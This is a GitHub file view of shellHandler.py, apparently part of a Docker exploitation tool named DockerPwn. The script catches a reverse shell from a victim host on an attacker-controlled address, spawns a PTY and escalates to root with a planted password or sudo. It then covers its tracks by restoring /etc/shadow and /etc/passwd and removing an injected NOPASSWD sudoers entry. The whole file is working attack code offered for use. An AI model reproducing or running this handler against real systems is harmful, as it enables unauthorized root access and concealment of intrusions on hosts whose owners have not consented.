-
Notifications
You must be signed in to change notification settings - Fork 27
/
shellHandler.py
68 lines (60 loc) · 2.79 KB
/
shellHandler.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!/usr/bin/python3
import nclib
import time
import os
def listen(c2, method):
print('[+] Listening for connection - We\'ll automatically escalate to root, and get a PTY.\n')
print('[!] Session I/O will be logged to ./DockerPwn.log\n')
hostIP = c2.split(':')[0]
hostPort = int(c2.split(':')[1])
dockerLog = open('DockerPwn.log', 'wb')
if method == 'shadowpwn':
shellListener = nclib.Netcat(listen=(hostIP, hostPort), log_send=dockerLog, log_recv=dockerLog)
shellListener.send(bytes('python3 -c \'import pty; pty.spawn("/bin/bash")\'', 'utf-8'))
shellListener.send(b'\x0D')
time.sleep(1.5)
shellListener.send(bytes('export TERM=screen', 'utf-8'))
shellListener.send(b'\x0D')
time.sleep(1.5)
shellListener.send(bytes('su', 'utf-8'))
shellListener.send(b'\x0D')
time.sleep(1.5)
shellListener.send(bytes('DockerPwn', 'utf-8'))
shellListener.send(b'\x0D')
time.sleep(1.5)
shellListener.send(bytes('cp /var/backups/shadow.bak /etc/shadow; cp /var/backups/passwd.bak /etc/passwd', 'utf-8'))
shellListener.send(b'\x0D')
time.sleep(1.5)
shellListener.send(b'\x0C')
shellListener.send(bytes('id; hostname; date;', 'utf-8'))
shellListener.send(b'\x0D')
elif method == 'userpwn':
shellListener = nclib.Netcat(listen=(hostIP, hostPort), log_send=dockerLog, log_recv=dockerLog)
shellListener.send(bytes('python3 -c \'import pty; pty.spawn("/bin/bash")\'', 'utf-8'))
shellListener.send(b'\x0D')
time.sleep(1.5)
shellListener.send(bytes('export TERM=screen', 'utf-8'))
shellListener.send(b'\x0D')
time.sleep(1.5)
shellListener.send(bytes('sudo su', 'utf-8'))
shellListener.send(b'\x0D')
time.sleep(1.5)
shellListener.send(bytes("cp /var/backups/shadow.bak /etc/shadow; cp /var/backups/passwd.bak /etc/passwd; sed -i 's/DockerPwn ALL=(ALL) NOPASSWD: ALL//g' /etc/sudoers", "utf-8"))
shellListener.send(b'\x0D')
time.sleep(1.5)
shellListener.send(b'\x0C')
shellListener.send(bytes('id; hostname; date', 'utf-8'))
shellListener.send(b'\x0D')
elif method == 'chrootpwn':
shellListener = nclib.Netcat(listen=(hostIP, hostPort), log_send=dockerLog, log_recv=dockerLog)
shellListener.send(bytes('python3 -c \'import pty; pty.spawn("/bin/bash")\'', 'utf-8'))
shellListener.send(b'\x0D')
time.sleep(1.5)
shellListener.send(bytes('export TERM=screen', 'utf-8'))
shellListener.send(b'\x0D')
time.sleep(1.5)
shellListener.send(b'\x0C')
shellListener.send(bytes('id; hostname; date', 'utf-8'))
shellListener.send(b'\x0D')
os.remove('shell.sh')
shellListener.interact()